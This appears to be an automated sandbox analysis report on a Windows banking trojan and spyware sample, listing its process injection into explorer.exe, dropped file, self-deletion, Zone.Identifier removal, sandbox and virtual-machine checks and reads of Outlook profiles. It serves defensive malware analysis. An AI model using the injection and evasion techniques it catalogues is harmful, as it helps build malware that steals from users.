            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, iexplore.exe
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, microsoftedgecp.exe
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, chrome.exe
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D226C CreateDesktopW,SetThreadDesktop,RtlZeroMemory,RtlZeroMemory,CreateProcessW,ResumeThread,
            Source: 1RMZ62tUAl.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_00241351 RtlAdjustPrivilege,ExitWindowsEx,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D2171 StrStrIW,StrStrIW,RtlZeroMemory,ShellExecuteExW,StrStrIW,RtlAdjustPrivilege,ExitWindowsEx,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E82304
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E9B520
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02EA5AAA
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E86A0C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E9AEFE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E8BE9B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02ED3FDA
            Source: C:\Windows\explorer.exeCode function: 20_2_00DF1E20
            Source: C:\Windows\explorer.exeCode function: 23_2_00312C18
            Source: C:\Windows\explorer.exeCode function: 23_2_00312308
            Source: C:\Windows\explorer.exeCode function: 25_2_00E92860
            Source: C:\Windows\explorer.exeCode function: 25_2_00E92054
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_003331E4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_003330E8
            Source: C:\Windows\explorer.exeCode function: 27_2_003F2154
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D803C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027DC392
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027DE95C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D3D28
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027DF9F4
            Source: C:\Windows\explorer.exeCode function: 30_2_01282A04
            Source: C:\Windows\explorer.exeCode function: 30_2_012820F4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D2ADD
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 027D8E70 appears 32 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02E87B12 appears 32 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02E883A3 appears 40 times
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCode function: 1_2_004019BC Sleep,NtTerminateProcess,
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCode function: 1_2_004019C7 Sleep,NtTerminateProcess,
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCode function: 1_2_004018E6 Sleep,NtTerminateProcess,
            Source: C:\Users\user\AppData\Roaming\favdejfCode function: 10_2_004019BC Sleep,NtTerminateProcess,
            Source: C:\Users\user\AppData\Roaming\favdejfCode function: 10_2_004019C7 Sleep,NtTerminateProcess,
            Source: C:\Users\user\AppData\Roaming\favdejfCode function: 10_2_004018E6 Sleep,NtTerminateProcess,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E84734 RtlMoveMemory,NtUnmapViewOfSection,
            Source: C:\Windows\explorer.exeCode function: 20_2_00DF38A4 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_00241016 RtlMoveMemory,NtUnmapViewOfSection,wsprintfA,RtlMoveMemory,lstrlen,RtlZeroMemory,RtlMoveMemory,RtlZeroMemory,Sleep,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00113C89 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00111F9A NtCreateSection,NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00112031 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\explorer.exeCode function: 23_2_00315014 RtlAllocateHeap,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D1819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D1A80 NtCreateSection,NtMapViewOfSection,
            Source: C:\Windows\explorer.exeCode function: 25_2_00E9355C RtlAllocateHeap,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00331016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_003315FE lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00331865 NtCreateSection,NtMapViewOfSection,
            Source: C:\Windows\explorer.exeCode function: 27_2_003F2B00 RtlAllocateHeap,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D1EBE RtlMoveMemory,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D1B26 NtCreateSection,NtMapViewOfSection,
            Source: C:\Windows\explorer.exeCode function: 30_2_0128370C RtlAllocateHeap,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D26A9 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D1CEF OpenProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D1C58 NtCreateSection,NtMapViewOfSection,
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
            Source: 1RMZ62tUAl.exeVirustotal: Detection: 46%
            Source: 1RMZ62tUAl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\1RMZ62tUAl.exe "C:\Users\user\Desktop\1RMZ62tUAl.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\favdejf C:\Users\user\AppData\Roaming\favdejf
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\favdejfJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6128.tmpJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@15/6@7/2
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_002411EC CreateToolhelp32Snapshot,Process32First,lstrcmpi,Process32Next,CloseHandle,
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCommand line argument: \H
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCommand line argument: BW?
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCommand line argument: lipupacuye
            Source: C:\Users\user\AppData\Roaming\favdejfCommand line argument: \H
            Source: C:\Users\user\AppData\Roaming\favdejfCommand line argument: BW?
            Source: C:\Users\user\AppData\Roaming\favdejfCommand line argument: lipupacuye
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
            Source: 1RMZ62tUAl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 1RMZ62tUAl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 1RMZ62tUAl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 1RMZ62tUAl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 1RMZ62tUAl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 1RMZ62tUAl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 1RMZ62tUAl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\rorefeb\45\xabev\wok_kedage 44_dehawovexan.pdb source: 1RMZ62tUAl.exe
            Source: Binary string: C:\rorefeb\45\xabev\wok_kedage 44_dehawovexan.pdbP source: 1RMZ62tUAl.exe

            Data Obfuscation:

            barindex
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeUnpacked PE file: 1.2.1RMZ62tUAl.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Roaming\favdejfUnpacked PE file: 10.2.favdejf.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCode function: 1_2_00402F29 push 00002ECAh; retf 002Eh
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCode function: 1_2_0042E3F0 push ecx; mov dword ptr [esp], 00000002h
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCode function: 1_2_021F24F8 push D95CF5DBh; retf
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCode function: 1_2_021F3949 push ebp; iretd
            Source: C:\Users\user\AppData\Roaming\favdejfCode function: 10_2_00402F29 push 00002ECAh; retf 002Eh
            Source: C:\Users\user\AppData\Roaming\favdejfCode function: 10_2_0042E3F0 push ecx; mov dword ptr [esp], 00000002h
            Source: C:\Windows\explorer.exeCode function: 20_2_00DF14D4 push esi; ret
            Source: C:\Windows\explorer.exeCode function: 20_2_00DF1405 push esi; ret
            Source: C:\Windows\explorer.exeCode function: 20_2_00DF47B7 push esp; iretd
            Source: C:\Windows\explorer.exeCode function: 20_2_00DFA119 push ds; ret
            Source: C:\Windows\explorer.exeCode function: 20_2_00DF9B16 push esp; iretd
            Source: C:\Windows\explorer.exeCode function: 20_2_00DFA1B3 push ss; rep ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_00242227 push esp; iretd
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00114FC7 push esp; iretd
            Source: C:\Windows\explorer.exeCode function: 23_2_00311405 push esi; ret
            Source: C:\Windows\explorer.exeCode function: 23_2_00316198 push eax; retf
            Source: C:\Windows\explorer.exeCode function: 23_2_003114D4 push esi; ret
            Source: C:\Windows\explorer.exeCode function: 23_2_003170C7 push esp; iretd
            Source: C:\Windows\explorer.exeCode function: 23_2_0031CAD8 push esp; iretd
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D3417 push esp; iretd
            Source: C:\Windows\explorer.exeCode function: 25_2_00E914D4 push esi; ret
            Source: C:\Windows\explorer.exeCode function: 25_2_00E945A7 push esp; iretd
            Source: C:\Windows\explorer.exeCode function: 25_2_00E91405 push esi; ret
            Source: C:\Windows\explorer.exeCode function: 27_2_003F14D4 push esi; ret
            Source: C:\Windows\explorer.exeCode function: 27_2_003F1405 push esi; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D8EB5 push ecx; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027F4E2C push eax; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027F4C63 push eax; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D3627 push esp; iretd
            Source: C:\Windows\explorer.exeCode function: 30_2_01281405 push esi; ret
            Source: C:\Windows\explorer.exeCode function: 30_2_01284817 push esp; iretd
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E82304 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,
            Source: initial sampleStatic PE information: section name: .text entropy: 7.06143863939
            Source: initial sampleStatic PE information: section name: .text entropy: 7.06143863939
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\favdejfJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\favdejfJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Deletes itself after installationShow sources
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\1rmz62tual.exeJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\favdejf:Zone.Identifier read attributes | delete
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_001137BC GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: 1RMZ62tUAl.exe, 00000001.00000002.357794252.00000000021DA000.00000004.00000020.sdmpBinary or memory string: ASWHOOK0$
            Contains functionality to compare user and computer (likely to detect sandboxes)Show sources
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,
            Checks if the current machine is a virtual machine (disk enumeration)Show sources
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\favdejfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\favdejfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\favdejfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\favdejfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\favdejfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\favdejfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Windows\explorer.exe TID: 6632Thread sleep count: 564 > 30
            Source: C:\Windows\explorer.exe TID: 6648Thread sleep count: 261 > 30
            Source: C:\Windows\explorer.exe TID: 6628Thread sleep count: 349 > 30
            Source: C:\Windows\explorer.exe TID: 6628Thread sleep time: -34900s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6612Thread sleep count: 331 > 30
            Source: C:\Windows\explorer.exe TID: 1144Thread sleep count: 131 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 1680Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_001137BC GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 564
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E860B4 GetSystemInfo,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E81EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E82C81 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_001114D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_001113FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,
